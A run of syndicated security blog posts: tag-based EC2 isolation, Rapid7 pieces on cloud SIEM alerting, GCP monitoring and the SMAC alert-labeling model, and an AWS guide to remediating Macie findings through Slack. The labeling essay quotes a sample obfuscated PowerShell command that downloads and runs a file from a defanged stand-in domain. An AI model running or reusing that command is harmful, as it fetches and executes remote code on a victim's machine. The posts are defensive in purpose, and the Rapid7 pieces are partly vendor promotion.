Using the CloudFormation template provided in this blog post, a Security Operations Center analyst with only tagging privileges could isolate an EC2 instance based on this tag. Alternatively, a security service such as Amazon GuardDuty could trigger a Lambda function to apply the tag as part of a workflow. This means the Security Operations Center analyst wouldn’t need administrative privileges over the EC2 service.

This solution creates an isolation security group for any new VPCs that don’t have one already. The security group would still follow the naming convention defined during the CloudFormation stack launch, but won’t be part of the provisioned resources. If you decide to delete the stack, manual cleanup would be required to remove these security groups.

This solution terminates established inbound Secure Shell (SSH) sessions that are associated to the instance, and isolates the instance from new connections either inbound or outbound. For outbound connections that are already established (for example, reverse shell), you either need to shut down the network interface card (NIC) at the operating system (OS) level, restart the instance network stack at the OS level, terminate the established connections, or apply a network access control list (network ACL).

For more information, see the following documentation:

If you have feedback about this post, submit comments in the Comments section below.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Jose Obando

Jose is a Security Consultant on the Global Financial Services team. He helps the world’s top financial institutions improve their security posture in the cloud. He has a background in network security and cloud architecture. In his free time, you can find him playing guitar or training in Muay Thai.

How to Combat Alert Fatigue With Cloud-Based SIEM Tools

Post Syndicated from Margaret Zonay original https://blog.rapid7.com/2021/02/22/how-to-combat-alert-fatigue-with-cloud-based-siem-tools/


Today’s security teams are facing more complexity than ever before. IT environments are changing and expanding rapidly, resulting in proliferating data as organizations adopt more tools to stay on top of their sprawling environments. And with an abundance of tools comes an abundance of alerts, leading to the inevitable alert fatigue for security operations teams. Research completed by Enterprise Strategy Group determined 40% of organizations use 10 to 25 separate security tools, and 30% use 26 to 50. That means thousands (or tens of thousands!) of alerts daily, depending on the organization’s size.

Fortunately, there’s a way to get the visibility your team needs and streamline alerts: leveraging a cloud-based SIEM. Here are a few key ways a cloud-based SIEM can help combat alert fatigue to accelerate threat detection and response.

Access all of your critical security data in one place

Traditional SIEMs focus primarily on log management and are centered around compliance instead of giving you a full picture of your network. The rigidity of these outdated solutions is the opposite of what today’s agile teams need. A cloud SIEM can unify diverse data sets across on-premises, remote, and cloud environments, to provide security operations teams with the holistic visibility they need in one place, eliminating the need to jump in and out of multiple tools (and the thousands of alerts that they produce).

With modern cloud SIEMs like Rapid7’s InsightIDR, you can collect more than just logs from across your environment and ingest data including user activity, cloud, endpoints, and network traffic—all into a single solution. With your data in one place, cloud SIEMs deliver meaningful context and prioritization to help you avoid an abundance of alerts.

Cut through the noise to detect attacks early in the attack chain

By analyzing all of your data together, a cloud SIEM uses machine learning to better recognize patterns in your environment to understand what’s normal and what’s a potential threat. The result? More fine-tuned detections so your team is only alerted when there are real signs of a threat.

Instead of bogging you down with false positives, cloud SIEMs provide contextual, actionable alerts. InsightIDR offers customers high-quality, out-of-the-box alerts created and curated by our expert analysts based on real threats—so you can stop attacks early in the attack chain instead of sifting through a mountain of data and worthless alerts.

Accelerate response with automation

With automation, you can reduce alert fatigue and further improve your SOC’s efficiency. By leveraging a cloud SIEM that has built-in automation, or that can integrate with a security orchestration, automation, and response (SOAR) tool, your SOC can offload a significant amount of its workload and free up analysts to focus on what matters most, all while still improving security posture.

A cloud SIEM with expert-driven detections and built-in automation enables security teams to respond to and remediate attacks in a fraction of the time, instead of manually investigating thousands of alerts. InsightIDR integrates seamlessly with InsightConnect, Rapid7’s security orchestration, automation, and response (SOAR) tool, to reduce alert fatigue, automate containment, and improve investigation handling.

With holistic network visibility and advanced analysis, cloud-based SIEM tools provide teams with high context alerts and correlation to fight alert fatigue and accelerate incident detection and response. Learn more about how InsightIDR can help eliminate alert fatigue and more by checking out our outcomes pages.


Monitor Google Cloud Platform (GCP) Data With InsightIDR

Post Syndicated from Margaret Zonay original https://blog.rapid7.com/2021/02/16/monitor-google-cloud-platform-gcp-data-with-insightidr/


InsightIDR was built in the cloud to support dynamic and rapidly changing environments—including remote workers, hybrid cloud and on-premises architectures, and fully cloud environments. Today, more and more organizations are adopting multi-cloud or hybrid environments, creating increasingly dispersed security environments. According to the 2020 IDG Cloud Computing Survey, 92% of organizations’ IT environments are at least somewhat cloud today, and more than half use multiple public clouds.

Google Cloud Platform (GCP) is one of the top cloud providers in 2021, and is trusted by leading companies across industries to help monitor their multi-cloud or hybrid environments. With a wide reach—GCP is available in over 200 countries and territories—it’s no wonder why.

To further provide support and monitoring capabilities for our customers, we recently added Google Cloud Platform (GCP) as an event source in InsightIDR. With this new integration, you’ll be able to collect user ingress events, administrative activity, and log data generated by GCP to monitor running instances and account activity within InsightIDR. You can also send firewall events to generate firewall alerts in InsightIDR, and threat detection logs to generate third-party alerts.

This new integration allows you to collect GCP data alongside your other security data in InsightIDR for expert alerting and more streamlined analysis of data across your environment.

Find Google Cloud threats fast with InsightIDR

Once you add GCP support, InsightIDR will be able to see users logging in to Google Cloud as ingress events as if they were connecting to the corporate network via VPN, allowing teams to:

  • Detect when ingress activity is coming from an untrusted source, such as a threat IP or an unusual foreign country.
  • Detect when users are logging into your corporate network and/or your Google Cloud environment from multiple countries at the same time, which should be impossible and is an indicator of a compromised account.
  • Detect when a user that has been disabled in your corporate network successfully authenticates to your Google Cloud environment, which may indicate a terminated employee has not had their access revoked from GCP and is now connected to the GCP environment.

For details on how to configure and leverage the GCP event source, check out our help docs.

Looking for more cloud coverage? Learn how InsightIDR covers both Azure and AWS cloud environments.


Talkin’ SMAC: Alert Labeling and Why It Matters

Post Syndicated from matthew berninger original https://blog.rapid7.com/2021/02/12/talkin-smac-alert-labeling-and-why-it-matters/


If you’ve ever worked in a Security Operations Center (SOC), you know that it’s a special place. Among other things, the SOC is a massive data-labeling machine, and generates some of the most valuable data in the cybersecurity industry. Unfortunately, much of this valuable data is often rendered useless because the way we label data in the SOC matters greatly. Sometimes decisions made with good intentions to save time or effort can inadvertently result in the loss or corruption of data.

Thoughtful measures must be taken ahead of time to ensure that the hard work SOC analysts apply to alerts results in meaningful, usable datasets. If properly recorded and handled, this data can be used to dramatically improve SOC operations. This blog post will demonstrate some common pitfalls of alert labeling, and will offer a new framework for SOCs to use—one that creates better insight into operations and enables future automation initiatives.

First, let’s define the scope of “SOC operations” for this discussion. All SOCs are different, and many do much more than alert triage, but for the purposes of this blog, let’s assume that a “typical SOC” ingests cybersecurity data in the form of alerts or logs (or both), analyzes them, and outputs reports and action items to stakeholders. Most importantly, the SOC decides which alerts don’t represent malicious activity, which do, and, if so, what to do about them. In this way, the SOC can be thought of as applying “labels” to the cybersecurity data that it analyzes.

There are at least three main groups that care about what the SOC is doing:

  1. SOC leadership/management
  2. Customers/stakeholders
  3. Intel/detection/research

These groups have different and sometimes overlapping questions about each alert. We will try to categorize these questions below into what we are now calling the Status, Malice, Action, Context (SMAC) model.

  • Status: SOC leaders and MDR/MSSP management typically want to know: Is this alert open? Is anyone looking at it? When was it closed? How long did it take?
  • Malice: Detection and threat intel teams want to know whether signatures are doing a good job separating good from bad. Did this alert find something malicious, or did it accidentally find something benign?
  • Action: Customers and stakeholders want to know if they have a problem, what it is, and what to do about it.
  • Context: Stakeholders, intelligence analysts, and researchers want to know more about the alert. Was it a red team? Was it internal testing? Was it the malware tied to advanced persistent threat (APT) actors, or was it a “commodity” threat? Was the activity sinkholed or blocked?
(Image: three example alert labeling dropdown menus, referred to below as Menu 1, Menu 2, and Menu 3)

What do these dropdowns all have in common? They are all trying to answer at least two—sometimes three or four—questions with only one drop down menu. Menu 1 has labels that indicate Status and Malice. Menu 2 covers Status, Malice, and Context. Menu 3 is trying to answer all four categories at once.

I have seen and used other interfaces in which “Status” labels are broken out into a separate dropdown, and while this is good, not separating the remaining categories—Malice, Action, or Context—still creates confusion.

I have also seen other interfaces like Menu 3, with dozens of choices available for seemingly every possible scenario. However, this does not allow for meaningful enforcement of different labels for different questions, and again creates confusion and noise.

What do I mean by confusion? Let’s walk through an example.

Malicious or Benign?

Here is a hypothetical windows process start alert:

Parent Process: WINWORD.EXE

Process: CMD.EXE

Process Arguments: 'pow^eRSheLL^.eX^e ^-e^x^ec^u^tI^o^nP^OLIcY^ ByP^a^S^s -nOProf^I^L^e^ -^WIndoWST^YLe H^i^D^de^N ^(ne^w-O^BJe^c^T ^SY^STeM. Ne^T^.^w^eB^cLie^n^T^).^Do^W^nlo^aDfi^Le(^’http:// www[.]badsite[.]top/user.php?f=1.dat’,^’%USERAPPDATA%. eXe’);s^T^ar^T-^PRO^ce^s^S^ ^%USERAPPDATA%.exe'

In this example,  let’s say the above details are the entirety of the alert artifact. Based solely on this information, an analyst would probably determine that this alert represents malicious activity. There is no clear legitimate reason for a user to perform this action in this way and, in fact, this syntax matches known malicious examples. So it should be labeled Malicious, right?

What if it’s not a threat?

However, what if, upon review of related network logs around the time of this execution, we found out that the connection to the www[.]badsite[.]top command and control (C2) domain was sinkholed? Would this alert now be labeled Benign or Malicious? Well, that depends who’s asking.

The artifact, as shown above, is indeed inherently malicious. The PowerShell command intends to download and execute a file within the %USERAPPDATA% directory, and has taken steps to hide its purpose by using PowerShell obfuscation characters. Moreover, PowerShell was spawned by WINWORD.EXE, which is something that isn’t usually legitimate. Last, this behavior matches other publicly documented examples of malicious activity.

Though we may have discovered the malicious callback was sinkholed, nothing in the alert artifact gives any indication that the attack was not successful. The fact that it was sinkholed is completely separate information, acquired from other, related artifacts. So from a detection or research perspective, this alert, on its own, is 100% malicious.

However, if you are the stakeholder or customer trying to manage a daily flood of escalations, tickets, and patching, the circumstantial information that it was sinkholed is very important. This is not a threat you need to worry about. If you get a report about some commodity attack that was sinkholed, that may be a waste of your time. For example, you may have internal workflows that automatically kick off when you receive a Malicious report, and you don’t want all that hassle for something that isn’t an urgent problem. So, from your perspective, given the choice between only Malicious or Benign, you may want this to be called Benign.

Downstream effects

Now, let’s say we only had one level of labeling and we marked the above alert Benign, since the connection to the C2 was sinkholed. Over time, analysts decide to adopt this as policy: mark as Benign any alert that doesn’t present an actual threat, even if it is inherently malicious. We may decide to still submit an “informational” report to let them know, but we don’t want to hassle customers with a bunch of false alarms, so they can focus on the real threats.


A year later, management decides to automate the analysis of these alerts entirely, so we have our data scientists train a model on the last year of labeled process-based artifacts. For some reason, the whiz-bang data science model routinely misses obfuscated PowerShell attacks! The reason, of course, is that the model saw a bunch of these marked “Benign” in the learning process, and has determined that obfuscated PowerShell syntax reaching out to suspicious domains like the above is perfectly fine and not something to worry about. After all, we have been teaching it that with our “Benign” designation, time and time again.

Our model’s false negative rate is through the roof. “Surely we can go back and find and re-label those,” we decide. “That will fix it!” Perhaps we can, but doing so requires us to perform the exact same work we already did over the past year. By limiting our labels to only one level of labeling, we have corrupted months of expensive expert analysis and rendered it useless. In order to fix it so we can automate our work, we now have to do even more work. And indeed, without separated labeling categories, we can fall into this same trap in other ways—even with the best intentions.

The playbook pitfall

Let’s say you are trying to improve efficiency in the SOC (and who isn’t, right?!). You identify that analysts spend a lot of time clicking buttons and copying alert text to write reports. So, after many months of development, you unveil the wonderful new Automated Response Reporting Workflow, which of course you have internally dubbed “Project ARRoW.” As soon as an analyst marks an alert as ‘Malicious’, a draft report is auto-generated with information from the alert and some boilerplate recommendations. All the analyst has to do is click “publish,” and poof—off it goes to the stakeholder! Analysts love it. Project ARRoW is a huge success.

However, after a month or so, some of your stakeholders say they don’t want any more Potentially Unwanted Program (PUP) reports. They are using some of the slick Application Programming Interface (API) integrations of your reporting portal, and every time you publish a report, it creates a ticket and a ton of work on their end. “Stop sending us these PUP reports!” they beg. So, of course you agree to stop—but the problem is that with ARRoW, if you mark an alert Malicious, a report is automatically generated, so you have to mark them Benign to avoid that. Except they’re not Benign.

Now your PUP signatures look bad even though they aren’t! Your PUP classification model, intended to automatically separate true PUP alerts from False Positives, is now missing actual Malicious activity (which, remember, all your other customers still want to know about) because it has been trained on bad labels. All this because you wanted to streamline reporting! Before you know it, you are writing individual development tickets to add customer-specific expectations to ARRoW. You even build a “Customer Exception Dashboard” to keep track of them all. But you’re only digging yourself deeper.


Applying multiple labels

The solution to this problem is to answer separate questions with separate answers. Applying a single label to an alert is insufficient to answer the multiple questions SOC stakeholders want to know:

  1. Has it been reviewed? (Status)
  2. Is it indicative of malicious activity? (Malice)
  3. Do I need to do something? (Action)
  4. What else do we know about the alert? (Context)

These questions should be answered separately in different categories, and that separation must be enforced. Some categories can be open-ended, while others must remain limited multiple choice.

Let me explain:

Status: The choices here should include default options like OPEN, CLOSED, REPORTED, ESCALATED, etc. but there should be an ability to add new status labels depending on an organization’s workflow. This power should probably be held by management, to ensure new labels are in line with desired workflows and metrics. Setting a label here should be mandatory to move forward with alert analysis.

Malice: This category is arguably the most important one, and should ideally be limited to two options total: Malicious or Benign. To clarify, I use Benign here to denote an activity that reflects normal usage of computing resources, but not for usage that is otherwise malicious in nature but has been mitigated or blocked. Moreover, Benign does not apply to activities that are intended to imitate malicious behavior, such as red teaming or testing. Put most simply, “Benign” activities are those that reflect normal user and administrative usage.

Note: If an org chooses to include a third label such as “Suspicious,” rest assured that this label will eventually be abused, perhaps in situations of circumstantial ambiguity, or as a placeholder for custom workflows. Adding any choices beyond Malicious or Benign will add noise to this dataset and reduce its usefulness. And take note—this reduction in utility is not linear. Even at very low levels of noise, the dataset will become functionally worthless. Properly implemented, analysts must choose between only Malicious or Benign, and entering a label here should be mandatory to move forward. If caveats apply, they can be added in a comments section, but all measures should be taken before polluting the label space.

Action: This is where you can record information that answers the question “Should I do something about this?” This can include options like “Active Compromise,” “Ignore,” “Informational,” “Quarantined,” or “Sinkholed.” Managers and administrators can add labels here as needed, and choosing a label should be mandatory to move forward. These labels need not be mutually exclusive, meaning you can choose more than one.

Context: This category can be used as a catch-all to record any information that you haven’t already captured, such as attribution, suspected malware family, whether or not it was testing or a red-team, etc. This is often also referred to as “tagging.” This category should be the most open to adding new labels, with some care taken to normalize labels so as to avoid things like ‘APT29’ vs. ‘apt29’, etc. This category need not be mandatory, and the labels should not be mutually exclusive.

Note: Because the Context category is the most flexible, there are potentials for abuse here. SOC leadership should regularly audit newly created Context labels and ensure workarounds are not being built to circumvent meaningful labeling in the previous categories.
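
To make the separation concrete, here is a minimal sketch of how the four SMAC categories might be modeled as independent fields on an alert record. This is purely illustrative; the specific status and action values are examples, not a prescribed schema.

from dataclasses import dataclass, field
from enum import Enum
from typing import List

class Status(Enum):          # workflow state; extendable by management
    OPEN = 'open'
    CLOSED = 'closed'
    REPORTED = 'reported'
    ESCALATED = 'escalated'

class Malice(Enum):          # strictly binary: Malicious or Benign
    MALICIOUS = 'malicious'
    BENIGN = 'benign'

@dataclass
class AlertLabel:
    status: Status                        # mandatory
    malice: Malice                        # mandatory, no third option
    actions: List[str]                    # e.g. ['Sinkholed', 'Informational']; not mutually exclusive
    context: List[str] = field(default_factory=list)  # free-form tags, e.g. ['red-team', 'apt29']
    comment: str = ''                     # caveats go here, not into the Malice label

# Example: the sinkholed PowerShell alert discussed earlier
label = AlertLabel(
    status=Status.REPORTED,
    malice=Malice.MALICIOUS,                 # the artifact itself is malicious
    actions=['Sinkholed', 'Informational'],  # but no urgent action is required
    context=['obfuscated-powershell'],
)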

Garbage in, garbage out

Supervised SOC models are like new analysts—they will “learn” from what other analysts have historically done. In a very simplified sense, when a model is “trained” on alert data, it looks at each alert, looks at the corresponding label, and tries to draw connections as to why that label was applied. However, unlike human analysts, supervised SOC models can’t ask follow-on contextual questions like, “Hey, why did you mark this as Benign?” or “Why are some of these marked ‘Red Team’ and others are marked ‘Testing?’” The machine learning (ML) model can only learn from the labels it is given. If the labels are wrong, the model will be wrong. Therefore, taking time to really think through how and why we label our data a certain way can have ramifications months and years later. If we label alerts properly, we can measure—and therefore improve—our operations, threat intel, and customer impact more successfully.

I also recognize that anyone in user interface (UI) design may be cringing at this idea. More buttons and more clicks in an already busy interface? Indeed, I have had these conversations when trying to implement systems like this. However, the long-term benefits of having statistically meaningful data outweigh the cost of adding another label or three. Separating categories in this way also makes the alerting workflow a much richer target for rules engines and automation. Because of the multiple categories, automatic alert-handling rules need not be all-or-nothing; they can be tailored to more complex combinations of labels.
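
Building on the AlertLabels sketch above, here is a rough illustration of the kind of label-driven triage rules this enables. The routing decisions are examples, not recommendations.

    def auto_handle(labels: AlertLabels) -> str:
        """Illustrative triage routing keyed on combinations of SMAC labels."""
        # Malicious behavior tagged as an exercise: close it as red team or testing activity.
        if labels.malice is Malice.MALICIOUS and {"red team", "testing"} & set(labels.context):
            return "close-as-exercise"
        # Malicious but already contained: notify the asset owner without paging anyone.
        if labels.malice is Malice.MALICIOUS and "Quarantined" in labels.action:
            return "notify-owner"
        # Anything flagged as an active compromise pages the on-call analyst.
        if "Active Compromise" in labels.action:
            return "page-on-call"
        # Benign, purely informational activity can be closed automatically.
        if labels.malice is Malice.BENIGN and labels.action == ["Informational"]:
            return "auto-close"
        return "route-to-analyst-queue"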

Why should we care about this?

Imagine a world where SOC analysts don't have to waste time reviewing obvious false positives or repetitive commodity malware. Imagine a world where SOC analysts tackle only the interesting questions: new types of evil, targeted activity, and active compromises.

Imagine a world where stakeholders get more timely and actionable alerts, rather than monthly rollups and the occasional after-action report when alerts are missed due to capacity issues.

Imagine centralized ML models learning directly from labels applied in customer SOCs. Knowledge about malicious behavior detected in one customer environment could instantaneously improve alert classification models for all customers.

SOC analysts with time to do deeper investigations, more hunting, and more training to keep up with new threats. Stakeholders with more value and less noise. Threat information instantaneously incorporated into real-time ML detection models. How do we get there?

The first step is building meaningful, useful alert datasets. Using a labeling scheme like the one described above will help improve fidelity and integrity in SOC alert labels, and pave the way for these innovations.


Deploy an automated ChatOps solution for remediating Amazon Macie findings

Post Syndicated from Nick Cuneo original https://aws.amazon.com/blogs/security/deploy-an-automated-chatops-solution-for-remediating-amazon-macie-findings/

The amount of data being collected, stored, and processed by Amazon Web Services (AWS) customers is growing at an exponential rate. In order to keep pace with this growth, customers are turning to scalable cloud storage services like Amazon Simple Storage Service (Amazon S3) to build data lakes at the petabyte scale. Customers are looking for new, automated, and scalable ways to address their data security and compliance requirements, including the need to identify and protect their sensitive data. Amazon Macie helps customers address this need by offering a managed data security and data privacy service that uses machine learning and pattern matching to discover and protect your sensitive data that is stored in Amazon S3.

In this blog post, I show you how to deploy a solution that establishes an automated event-driven workflow for notification and remediation of sensitive data findings from Macie. Administrators can review and approve remediation of findings through a ChatOps-style integration with Slack. Slack is a business communication tool that provides messaging functionality, including persistent chat rooms known as channels. With this solution, you can streamline the notification, investigation, and remediation of sensitive data findings in your AWS environment.

Prerequisites

Before you deploy the solution, make sure that your environment is set up with the following prerequisites:

Important: This solution uses various AWS services, and there are costs associated with these resources after the Free Tier usage. See the AWS pricing page for details.

Solution overview

The solution architecture and workflow are detailed in Figure 1.

Figure 1: Solution overview


This solution allows for the configuration of auto-remediation behavior based on finding type and finding severity. For each finding type, you can define whether you want the offending S3 object to be automatically quarantined, or whether you want the finding details to be reviewed and approved by a human in Slack prior to being quarantined. In a similar manner, you can define the minimum severity level (Low, Medium, High) that a finding must have before the solution will take action. By adjusting these parameters, you can manage false positives and tune the volume and type of findings about which you want to be notified and take action. This configurability is important because customers have different security, risk, and regulatory requirements.
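
In practice, that gating comes down to two checks: is the finding severe enough to act on at all, and is its type configured for automatic or reviewed remediation? The following sketch shows the shape of that logic; the finding-type keys and the threshold value are examples, not the solution's actual code.

    SEVERITY_ORDER = {"LOW": 1, "MEDIUM": 2, "HIGH": 3}

    # Example per-finding-type choices: AUTO quarantines immediately,
    # REVIEW asks for approval in Slack first.
    AUTO_REMEDIATE_CONFIG = {
        "SensitiveData:S3Object/Financial": "AUTO",
        "SensitiveData:S3Object/Personal": "REVIEW",
    }
    MIN_SEVERITY = "MEDIUM"


    def decide(finding_type: str, severity: str) -> str:
        """Return 'ignore', 'auto_quarantine', or 'slack_review' for a Macie finding."""
        if SEVERITY_ORDER.get(severity.upper(), 0) < SEVERITY_ORDER[MIN_SEVERITY]:
            return "ignore"
        if AUTO_REMEDIATE_CONFIG.get(finding_type) == "AUTO":
            return "auto_quarantine"
        return "slack_review"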

Figure 1 details the services used in the solution and the integration points between them. Let’s walk through the full sequence from the detection of sensitive data to the remediation (quarantine) of the offending object.

  1. Macie is configured with sensitive data discovery jobs (scheduled or one-time), which you create and run to detect sensitive data within S3 buckets. When Macie runs a job, it uses a combination of criteria and techniques to analyze objects in S3 buckets that you specify. For a full list of the categories of sensitive data Macie can detect, see the Amazon Macie User Guide.
  2. For each sensitive data finding, an event is sent to Amazon EventBridge that contains the finding details. An EventBridge rule triggers a Lambda function for processing.
  3. The Finding Handler Lambda function parses the event and examines the type of the finding. Based on the auto-remediation configuration, the function either invokes the Finding Remediator function for immediate remediation, or sends the finding details for manual review and remediation approval through Slack.
  4. Delegated security and compliance administrators monitor the configured Slack channel for notifications. Notifications provide high-level finding information, remediation status, and a link to the Macie console for the finding in question. For findings configured for manual review, administrators can choose to approve the remediation in Slack by using an action button on the notification.
  5. After an administrator chooses the Remediate button, Slack issues an API call to an Amazon API Gateway endpoint, supplying both the unique identifier of the finding to be remediated and that of the Slack user. API Gateway proxies the request to a Remediation Handler Lambda function.
  6. The Remediation Handler Lambda function validates the request and request signature (a sketch of this signature check appears after this list), extracts the offending object’s location from the finding, and makes an asynchronous call to the Finding Remediator Lambda function.
  7. The Finding Remediator Lambda function moves the offending object from the source bucket to a designated S3 quarantine bucket with restricted access.
  8. Finally, the Finding Remediator Lambda function uses a callback URL to update the original finding notification in Slack, indicating that the offending object has now been quarantined.
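
The signature check in step 6 follows Slack's published v0 request-signing scheme: the app's signing secret is used to compute an HMAC-SHA256 over the request timestamp and raw body, and the result is compared against the X-Slack-Signature header. The following is a minimal sketch of that check, not the handler code deployed by this solution.

    import hashlib
    import hmac
    import time


    def verify_slack_signature(signing_secret: str, headers: dict, raw_body: str) -> bool:
        """Validate Slack's v0 signature (HMAC-SHA256 over 'v0:timestamp:body')."""
        timestamp = headers.get("X-Slack-Request-Timestamp", "")
        received_sig = headers.get("X-Slack-Signature", "")
        # Reject replays: ignore requests older than five minutes.
        if not timestamp or abs(time.time() - int(timestamp)) > 60 * 5:
            return False
        basestring = f"v0:{timestamp}:{raw_body}"
        expected_sig = "v0=" + hmac.new(
            signing_secret.encode("utf-8"), basestring.encode("utf-8"), hashlib.sha256
        ).hexdigest()
        return hmac.compare_digest(expected_sig, received_sig)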

Deploy the solution

Now we’ll walk through the steps for configuring Slack and deploying the solution into your AWS environment by using the AWS CDK. The AWS CDK is a software development framework that you can use to define cloud infrastructure in code and provision through AWS CloudFormation.

The deployment steps can be summarized as follows:

  1. Configure a Slack channel and app
  2. Check the project out from GitHub
  3. Set the configuration parameters
  4. Build and deploy the solution
  5. Configure Slack with an API Gateway endpoint

To configure a Slack channel and app

  1. In your browser, make sure you’re logged into the Slack workspace where you want to integrate the solution.
  2. Create a new channel where you will send the notifications, as follows:
    1. Choose the + icon next to the Channels menu, and select Create a channel.
    2. Give your channel a name, for example macie-findings, and make sure you turn on the Make private setting.

      Important: By providing Slack users with access to this configured channel, you’re providing implicit access to review Macie finding details and approve remediations. To avoid unwanted user access, it’s strongly recommended that you make this channel private and by invite only.

  3. On your Apps page, create a new app by selecting Create New App, and then enter the following information:
    1. For App Name, enter a name of your choosing, for example MacieRemediator.
    2. Select your chosen development Slack workspace that you logged into in step 1.
    3. Choose Create App.
    Figure 2: Create a Slack app


  4. You will then see the Basic Information page for your app. Scroll down to the App Credentials section, and note down the Signing Secret. This secret will be used by the Lambda function that handles all remediation requests from Slack. The function uses the secret with Hash-based Message Authentication Code (HMAC) authentication to validate that requests to the solution are legitimate and originated from your trusted Slack channel.

    Figure 3: Signing secret


  5. Scroll back to the top of the Basic Information page, and under Add features and functionality, select the Incoming Webhooks tile. Turn on the Activate Incoming Webhooks setting.
  6. At the bottom of the page, choose Add New Webhook to Workspace.
    1. Select the macie-findings channel you created in step 2, and choose Allow.
    2. You should now see webhook URL details under Webhook URLs for Your Workspace. Use the Copy button to note down the URL, which you will need later.

      Figure 4: Webhook URL


To check the project out from GitHub

The solution source is available on GitHub in AWS Samples. Clone the project to your local machine or download and extract the available zip file.

To set the configuration parameters

In the root directory of the project you’ve just cloned, there’s a file named cdk.json. This file contains configuration parameters to allow integration with the macie-findings channel you created earlier, and also to allow you to control the auto-remediation behavior of the solution. Open this file and make sure that you review and update the following parameters:

  • autoRemediateConfig – This nested attribute allows you to specify for each sensitive data finding type whether you want to automatically remediate and quarantine the offending object, or first send the finding to Slack for human review and authorization. Note that you will still be notified through Slack that auto-remediation has taken place if this attribute is set to AUTO. Valid values are either AUTO or REVIEW. You can use the default values.
  • minSeverityLevel – Macie assigns all findings a Severity level. With this parameter, you can define a minimum severity level that must be met before the solution will trigger action. For example, if the parameter is set to MEDIUM, the solution won’t take any action or send any notifications when a finding has a LOW severity, but will take action when a finding is classified as MEDIUM or HIGH. Valid values are: LOW, MEDIUM, and HIGH. The default value is set to LOW.
  • slackChannel – The name of the Slack channel you created earlier (macie-findings).
  • slackWebHookUrl – For this parameter, enter the webhook URL that you noted down during Slack app setup in the “Configure a Slack channel and app” step.
  • slackSigningSecret – For this parameter, enter the signing secret that you noted down during Slack app setup.

Save your changes to the configuration file.

To build and deploy the solution

  1. From the command line, make sure that your current working directory is the root directory of the project that you cloned earlier. Run the following commands:
    • npm install – Installs all Node.js dependencies.
    • npm run build – Compiles the CDK TypeScript source.
    • cdk bootstrap – Initializes the CDK environment in your AWS account and Region, as shown in Figure 5.

      Figure 5: CDK bootstrap output


    • cdk deploy – Generates a CloudFormation template and deploys the solution resources.

    The resources created can be reviewed in the CloudFormation console and can be summarized as follows:

    • Lambda functions – Finding Handler, Remediation Handler, and Remediator
    • IAM execution roles and associated policy – The roles and policy associated with each Lambda function and the API Gateway
    • S3 bucket – The quarantine S3 bucket
    • EventBridge rule – The rule that triggers the Lambda function for Macie sensitive data findings
    • API Gateway – A single remediation API with proxy integration to the Lambda handler
  2. After you run the deploy command, you’ll be prompted to review the IAM resources deployed as part of the solution. Press y to continue.
  3. Once the deployment is complete, you’ll be presented with an output parameter, shown in Figure 6, which is the endpoint for the API Gateway that was deployed as part of the solution. Copy this URL.

    Figure 6: CDK deploy output


To configure Slack with the API Gateway endpoint

  1. Open Slack and return to the Basic Information page for the Slack app you created earlier.
  2. Under Add features and functionality, select the Interactive Components tile.
  3. Turn on the Interactivity setting.
  4. In the Request URL box, enter the API Gateway endpoint URL you copied earlier.
  5. Choose Save Changes.

    Figure 7: Slack app interactivity


Now that you have the solution components deployed and Slack configured, it’s time to test things out.

Test the solution

The testing steps can be summarized as follows:

  1. Upload dummy files to S3
  2. Run the Macie sensitive data discovery job
  3. Review and act upon Slack notifications
  4. Confirm that S3 objects are quarantined

To upload dummy files to S3

Two sample text files containing dummy financial and personal data are available in the project you cloned from GitHub. If you haven’t changed the default auto-remediation configurations, these two files will exercise both the auto-remediation and manual remediation review flows.

Find the files under sensitive-data-samples/dummy-financial-data.txt and sensitive-data-samples/dummy-personal-data.txt. Take these two files and upload them to S3 by using either the console, as shown in Figure 8, or the AWS CLI. You can choose to use any new or existing bucket, but make sure that the bucket is in the same AWS account and Region that was used to deploy the solution.

Figure 8: Dummy files uploaded to S3

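If you'd rather script the upload than use the console or the AWS CLI, a short boto3 snippet such as the following also works. The bucket name is a placeholder; use a bucket in the same account and Region as the deployed solution.

    import boto3

    s3 = boto3.client("s3")
    bucket = "your-test-bucket"  # placeholder; same account and Region as the solution

    for path in (
        "sensitive-data-samples/dummy-financial-data.txt",
        "sensitive-data-samples/dummy-personal-data.txt",
    ):
        s3.upload_file(path, bucket, path.split("/")[-1])
        print(f"Uploaded {path} to s3://{bucket}/")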

To run a Macie sensitive data discovery job

  1. Navigate to the Amazon Macie console, and make sure that your selected Region is the same as the one that was used to deploy the solution.
    1. If this is your first time using Macie, choose the Get Started button, and then choose Enable Macie.
  2. On the Macie Summary dashboard, you will see a Create Job button at the top right. Choose this button to launch the Job creation wizard. Configure each step as follows:
    1. Select S3 buckets: Select the bucket where you uploaded the dummy sensitive data file. Choose Next.
    2. Review S3 buckets: No changes are required, choose Next.
    3. Scope: For Job type, choose One-time job. Make sure Sampling depth is set to 100%. Choose Next.
    4. Custom data identifiers: No changes are required, choose Next.
    5. Name and description: For Job name, enter any name you like, such as Dummy job, and then choose Next.
    6. Review and create: Review your settings; they should look like the following sample. Choose Submit.
Figure 9: Configure the Macie sensitive data discovery job


Macie will launch the sensitive data discovery job. You can track its status from the Jobs page within the Macie console.
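
The console wizard is the path documented above; if you prefer to create the equivalent one-time job programmatically, it looks roughly like the following boto3 call. The account ID and bucket name are placeholders.

    import boto3
    import uuid

    macie = boto3.client("macie2")  # same Region as the deployed solution

    response = macie.create_classification_job(
        clientToken=str(uuid.uuid4()),
        jobType="ONE_TIME",
        name="Dummy job",
        samplingPercentage=100,
        s3JobDefinition={
            "bucketDefinitions": [
                {"accountId": "111122223333", "buckets": ["your-test-bucket"]}  # placeholders
            ]
        },
    )
    print("Created Macie job:", response["jobId"])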

To review and take action on Slack notifications

Within five minutes of submitting the data discovery job, you should expect to see two notifications appear in your configured Slack channel. One notification, similar to the one in Figure 10, is informational only and is related to an auto-remediation action that has taken place.

Figure 10: Slack notification of auto-remediation for the file containing dummy financial data


The other notification, similar to the one in Figure 11, requires end user action and is for a finding that requires administrator review. All notifications will display key information such as the offending S3 object, a description of the finding, the finding severity, and other relevant metadata.

Figure 11: Slack notification for human review of the file containing dummy personal data


(Optional) You can review the finding details by choosing the View Macie Finding in Console link in the notification.

In the Slack notification, choose the Remediate button to quarantine the object. The notification will be updated with confirmation of the quarantine action, as shown in Figure 12.

Figure 12: Slack notification of authorized remediation


To confirm that S3 objects are quarantined

Finally, navigate to the S3 console and validate that the objects have been removed from their original bucket and placed into the quarantine bucket listed in the notification details, as shown in Figure 13. Note that you may need to refresh your S3 object listing in the browser.

Figure 13: Objects moved to the designated S3 quarantine bucket
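
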